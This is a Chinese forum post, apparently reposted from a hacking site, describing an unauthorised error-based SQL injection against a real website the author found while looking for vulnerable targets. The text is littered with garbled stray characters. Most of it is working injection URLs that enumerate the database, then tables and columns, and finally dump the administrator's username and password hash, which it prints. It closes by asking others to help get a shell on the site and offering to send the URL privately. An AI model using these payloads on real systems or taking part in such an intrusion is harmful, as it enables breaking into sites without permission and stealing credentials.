近一直在学习数据库方面的知识,一直在钻研PHP的一些高级注入语法,感觉比较的有意思。于是就在网上找有洞的网站练习手注。于是有了下文。
. A/ X8 _3 `$ ~首先找到网站后台,加了个admin,后台出来了 2 H; k# _" Y5 W
; v _3 `0 n! Q- Y
1 f7 B8 T4 e" [, C
然后看了下网站,发现貌似都是html静态网页,但是通过图片链接发现应该是伪静态,于是在后面加了个 ',报错了,初步判断可以注入" _- S& ]! H1 z% T
http://www.myhack58.com/Article/UploadPic/2012-12/20121218145843714.jpg 从报错语句中我们可以判断出存在frame_board_conference 表,知道存在frame_board_conference,可以方便我们后面的注入。这里我用的是错误回显注入。 首先查下数据库相关信息。 www.xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*) from+frame_board_conference+group+by+concat(0x3a,concat(0x3a,database(),0x3a,version()),floor(rand(0)*2)))—) Z6 C( x' K9 D- z- R
& h' |/ b. G# K" G2 i% A
/ f1 r3 {! p6 n4 ^. j) w' f8 ~( J3 }0 }0 x, W5 t. @2 [* u
) ~* l9 A- U( _7 I( rhttp://www.myhack58.com/Article/UploadPic/2012-12/20121218145846722.jpg
* ]) g5 I+ b1 l& r( r( s% J% I, m" I1 A2 N
) j0 h5 R8 p1 M, R& u
" l# I3 k: _( U3 M- z& j! o' ]
8 @! W2 n U: }8 ^- ~2 m, N6 s可以看到数据库版本为5.0.32,存在information_schema表,可以进一步的注入。 然后我们查表 http://xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(table_name),1,150)from+information_schema.tables+where+table_schema=database()),0x3a,floor(rand(0)*2)))-- 得到管理员表段frame_administrator
2 I7 ^. k0 A( D5 M. r, P: j# l4 a2 W" [9 R" Y* U! `% I; P1 Q
+ V' M9 G- U" N D' i
http://www.myhack58.com/Article/UploadPic/2012-12/20121218145846695.jpg
5 A; |) O p2 d2 `# M
# [) g: `" S Z8 {5 a" n
7 V, ?$ M' x* {1 Z2 l. \ 查字段 http://www.xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(column_name),1,150)from+information_schema.columns+where+table_name=0x6672616d655f61646d696e6973747261746f72),0x3a,floor(rand(0)*2)))--( t- k. A/ z# r! }
# f: N% d! U2 S7 S' L
* a% o' O/ a" C- V, ?. [. c3 Q
4 h) Q) z: r' @% M+ f2 p+ d 得到userID,userPass字段 最后 http://xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(userID,0x3a,userPass,0x0a),1,150)from+frame_administrator),0x3a,floor(rand(0)*2)))--& f6 {9 w) x- r2 B" x4 N$ ?
2 c5 X" c0 B7 `7 h" t$ j( R
5 ~; e, A8 \' K- A3 k. f
- _6 n( {( e. u; I$ E$ x3 \
得到最终结果admin eb0a191797624dd3a48fa681d3061212 解密后成功进入后台,但是在获得shell的过程中出了点问题,可以穿php但是貌似无法解析,不知道什么原因,本人很菜,在这里希望大牛有兴趣的话帮忙拿下shell,感激不尽。Pm我,我把网址发给你。 |